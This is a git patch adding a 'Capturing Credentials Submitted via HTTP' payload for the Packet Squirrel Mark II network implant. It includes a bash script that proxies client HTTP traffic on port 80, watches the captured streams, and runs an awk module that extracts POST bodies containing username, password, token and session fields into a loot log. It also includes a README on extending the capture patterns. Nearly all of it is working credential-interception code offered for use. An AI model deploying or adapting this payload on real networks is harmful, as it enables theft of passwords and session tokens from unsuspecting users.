From 1c86254f9efa82ed4c8d5b7bfdd81f8495945248 Mon Sep 17 00:00:00 2001
From: TW-D <75358550+TW-D@users.noreply.github.com>
Date: Wed, 3 Dec 2025 07:57:54 -0500
Subject: [PATCH] Capturing Credentials Submitted via HTTP

This payload uses *inotifywait* and *DYNAMICPROXY* to monitor the HTTP POST data streams generated by a client and extract sensitive information using *awk*.
---
 .../capturing-http-credentials/README.md      | 22 +++++
 .../modules/login_request.awk                 | 30 +++++++
 .../capturing-http-credentials/payload        | 81 +++++++++++++++++++
 3 files changed, 133 insertions(+)
 create mode 100644 payloads/credentials/capturing-http-credentials/README.md
 create mode 100644 payloads/credentials/capturing-http-credentials/modules/login_request.awk
 create mode 100644 payloads/credentials/capturing-http-credentials/payload

diff --git a/payloads/credentials/capturing-http-credentials/README.md b/payloads/credentials/capturing-http-credentials/README.md
new file mode 100644
index 0000000..fde1cdd
--- /dev/null
+++ b/payloads/credentials/capturing-http-credentials/README.md
@@ -0,0 +1,22 @@
+# Capturing Credentials Submitted via HTTP
+
+- Author:       TW-D
+- Version:      1.0
+- Category:     Credentials
+- Netmode:      NAT
+
+## Prerequisite
+
+Packet Squirrel Mark II
+
+## Description
+
+This payload uses *inotifywait* and *DYNAMICPROXY* to monitor the HTTP POST data streams generated by a client and extract sensitive information using *awk*.
+
+## Configuration
+
+In the **./modules/login_request.awk** file, you can improve the regular expression, contained in the **login_patterns** variable (L3), by adding new HTTP parameters. Additionally, you can add new *AWK* files to the **./modules/** directory; they will be automatically taken into account.
+
+## Usage
+
+The captured credentials will be available in the file **./loots/credentials/<TIMESTAMP>.log**.
diff --git a/payloads/credentials/capturing-http-credentials/modules/login_request.awk b/payloads/credentials/capturing-http-credentials/modules/login_request.awk
new file mode 100644
index 0000000..ade0e92
--- /dev/null
+++ b/payloads/credentials/capturing-http-credentials/modules/login_request.awk
@@ -0,0 +1,30 @@
+BEGIN {
+    header_content = ""
+    login_patterns = "(sid=|uid=|user=|pass=|email=|login=|token=|session=|username=|password=)[^&]*"
+}
+
+/POST \// {
+    post_header = 1
+}
+
+post_header == 1 {
+    header_line = $0
+    if (header_line ~ /^[[:space:]]*$/) {
+        post_header = 0
+        post_body = 1
+        next
+    } else {
+        header_content = (header_content != "") ? header_content "\n" : header_content
+        header_content = header_content header_line
+    }
+}
+
+post_body == 1 {
+    body_line = $0
+    if (body_line ~ login_patterns) {
+        print header_content
+        print body_line
+    }
+    post_body = 0
+    header_content = ""
+}
diff --git a/payloads/credentials/capturing-http-credentials/payload b/payloads/credentials/capturing-http-credentials/payload
new file mode 100644
index 0000000..05f77a3
--- /dev/null
+++ b/payloads/credentials/capturing-http-credentials/payload
@@ -0,0 +1,81 @@
+#!/bin/bash
+#
+# Title:            Capturing Credentials Submitted via HTTP
+# Description:
+#                   This payload uses inotifywait and DYNAMICPROXY
+#                   to monitor the HTTP POST data streams generated
+#                   by a client and extract sensitive information using awk.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Credentials
+# Prerequisites:
+# - Packet Squirrel Mark II
+#
+# Netmode:          NAT
+#
+# STATUS
+# ================
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Waiting for a button press ...................... OFF
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## CONSTANTS ########
+
+PAYLOAD_SWITCH="/root/payloads/$(SWITCH)"
+readonly PAYLOAD_SWITCH
+
+readonly PAYLOAD_LOOTS="${PAYLOAD_SWITCH}/loots"
+readonly LOOTS_CREDENTIALS="${PAYLOAD_LOOTS}/credentials"
+readonly LOOTS_STREAMS="${PAYLOAD_LOOTS}/streams"
+readonly PAYLOAD_MODULES="${PAYLOAD_SWITCH}/modules"
+
+###########################
+
+set -u
+
+LED SETUP
+
+NETMODE NAT
+
+if [[ ! -d "${PAYLOAD_LOOTS}" ]]; then
+    mkdir -p "${LOOTS_CREDENTIALS}" "${LOOTS_STREAMS}"
+fi
+
+LED ATTACK
+
+credentials_search() {
+    inotifywait --monitor --format '%w%f' --event close_write "${LOOTS_STREAMS}" | while read -r dynamicproxy_stream; do
+        if [[ -f "${dynamicproxy_stream}" ]]; then
+            case "${dynamicproxy_stream}" in
+                *_CLIENT.stream)
+                    for awk_module in "${PAYLOAD_MODULES}"/*.awk; do
+                        awk -f "${awk_module}" "${dynamicproxy_stream}"
+                    done
+                    ;;
+            esac
+            rm "${dynamicproxy_stream}"
+        fi
+    done
+}
+credentials_search &> "${LOOTS_CREDENTIALS}/$(date +%s).log" &
+cs_pid="${!}"
+
+DYNAMICPROXY CLIENT "${LOOTS_STREAMS}/http_" 80 &
+dp_pid="${!}"
+
+LED OFF
+
+NO_LED=1 BUTTON
+
+LED CLEANUP
+
+kill "${dp_pid}" "${cs_pid}"
+sync
+
+LED FINISH
+
+poweroff